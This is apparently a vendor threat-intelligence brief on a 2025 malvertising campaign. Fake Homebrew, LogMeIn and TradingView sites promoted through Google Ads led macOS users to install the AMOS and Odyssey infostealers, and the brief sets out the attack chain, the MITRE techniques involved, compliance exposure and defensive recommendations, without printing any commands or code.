Fake Homebrew and LogMeIn Sites Spread Infostealer Malware via Google Ads in 2025
Executive Summary
In October 2025, a sophisticated malvertising campaign exploited Google Ads to distribute infostealing malware via fake Homebrew, LogMeIn, and TradingView websites targeting macOS users and developers. The threat actors registered over 85 convincing domains and lured victims to enter terminal commands that downloaded malware such as AMOS (Atomic macOS Stealer) and Odyssey Stealer. Once executed, these payloads bypassed security controls, harvested browser credentials, cryptocurrency wallets, and sensitive files, and forwarded the stolen data to threat actor-controlled servers. This campaign underscores the effectiveness of ClickFix social engineering techniques and highlights the risks of trust in search advertising.
The incident is particularly relevant as infostealer malware continues to evolve with new tactics, including sophisticated social engineering, supply chain targeting, and persistent access capabilities. Organizations face increasing pressure to defend against rapidly shifting malware delivery channels and enforce user education to reduce the likelihood of compromise.
Why This Matters Now
This campaign demonstrates that attackers are actively weaponizing trusted platforms like Google Ads to deliver high-impact malware to technical users, including developers. The abuse of search advertising and social engineering to distribute infostealers poses urgent threats to data security, compliance, and brand integrity, especially as these campaigns target both personal and enterprise environments.
Attack Path Analysis
The attack began with users lured by malicious Google ads to fake Homebrew, LogMeIn, and TradingView sites (Initial Compromise). Victims were tricked into running terminal commands granting root privileges to downloaded infostealer malware (Privilege Escalation). After installation, malware interacted with macOS services and potentially established persistence while attempting to evade detection (Lateral Movement). The malware set up command and control connections to receive further instructions and enable operator access (Command & Control). Sensitive data including credentials, browser data, and files were exfiltrated to attacker infrastructure (Exfiltration). Ultimately, the impact included credential theft, loss of financial and personal data, and the risk of backdoor persistence for future compromise (Impact).
Kill Chain Progression
Initial Compromise
Description
Users were deceived via malvertising and phishing sites into running terminal commands that initiated the download of malicious installers.
MITRE ATT&CK® Techniques
Phishing: Spearphishing via Service
Trusted Relationship
User Execution: Malicious Link
Command and Scripting Interpreter: Unix Shell
Abuse Elevation Control Mechanism: Sudo and Sudo Caching
Impair Defenses: Disable or Modify Tools
Screen Capture
Exfiltration Over C2 Channel
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Review of Audit Logs
Control ID: 10.2.1
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: 500.03
DORA (Digital Operational Resilience Act) – Information and Communication Technology (ICT) Risk Management
Control ID: Art. 9
CISA Zero Trust Maturity Model 2.0 – User Education and Social Engineering Mitigation
Control ID: Identity Pillar - User Education
NIS2 Directive – Technical and Organizational Measures to Manage Risks
Control ID: Art. 21
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Computer Software/Engineering
macOS developers targeted through fake Homebrew sites delivering AMOS infostealer via malicious Google ads, compromising development environments and source code repositories.
Financial Services
TradingView impersonation sites steal cryptocurrency credentials and financial data, exploiting trust in legitimate trading platforms to harvest sensitive financial information.
Information Technology/IT
LogMeIn spoofing attacks target IT professionals using remote access tools, enabling lateral movement and credential theft across enterprise network infrastructures.
Capital Markets/Hedge Fund/Private Equity
Trading platform impersonation specifically targets financial analysts and traders, stealing market analysis credentials and potentially compromising proprietary trading strategies.
Sources
- Google ads for fake Homebrew, LogMeIn sites push infostealershttps://www.bleepingcomputer.com/news/security/google-ads-for-fake-homebrew-logmein-sites-push-infostealers/Verified
- Atomic macOS Stealer malware now has a backdoorhttps://appleinsider.com/articles/25/07/08/atomic-macos-stealer-malware-is-now-more-dangerousVerified
- MacOS malware Poseidon Stealer rebranded as Odyssey Stealerhttps://www.scworld.com/news/macos-malware-poseidon-staler-rebranded-as-odyssey-stealerVerified
- Atomic macOS Stealer leads sensitive data theft on macOShttps://news.sophos.com/en-us/2024/09/06/atomic-macos-stealer-leads-sensitive-data-theft-on-macos/Verified
Frequently Asked Questions
Cloud Native Security Fabric Mitigations and ControlsCNSF
Cloud Network Security Framework (CNSF) and Zero Trust controls such as egress policy enforcement, microsegmentation, and anomaly detection would have limited the adversary's ability to establish malicious connections, move laterally, or exfiltrate sensitive data—significantly disrupting the attack chain.
Control: Cloud Firewall (ACF)
Mitigation: Access to known malicious domains and URLs would be blocked.
Control: Threat Detection & Anomaly Response
Mitigation: Suspicious privilege escalations are detected and flagged for incident response.
Control: Zero Trust Segmentation
Mitigation: East-west movement of malware across services and workloads is prevented.
Control: Egress Security & Policy Enforcement
Mitigation: Malicious outbound traffic to command and control servers is blocked or closely monitored.
Control: Encrypted Traffic (HPE)
Mitigation: Detection of unencrypted or anomalous data transfers prevents covert exfiltration.
Full visibility and centralized policy allow rapid detection and remediation, limiting attack impact.
Impact at a Glance
Affected Business Functions
- Software Development
- Financial Services
- Cryptocurrency Trading
Estimated downtime: 3 days
Estimated loss: $500,000
Potential exposure of sensitive data including system passwords, browser-stored credentials, cryptocurrency wallet information, and personal files. This could lead to unauthorized access to financial accounts, intellectual property theft, and compromise of confidential communications.
Recommended Actions
Key Takeaways & Next Steps
- • Implement URL and domain filtering at cloud firewall egress points to block access to known phishing and malware distribution sites.
- • Enforce zero trust segmentation and microsegmentation to prevent lateral movement and restrict workloads to only necessary communications.
- • Deploy continuous threat detection and anomaly response to alert on unusual privilege escalations, process behaviors, or outbound network traffic.
- • Apply strict egress security policies combined with encrypted traffic inspection to block unauthorized data exfiltration and prevent C2 communications.
- • Centralize network visibility and policy enforcement across all cloud and hybrid environments to enable rapid incident response and minimize attack impact.
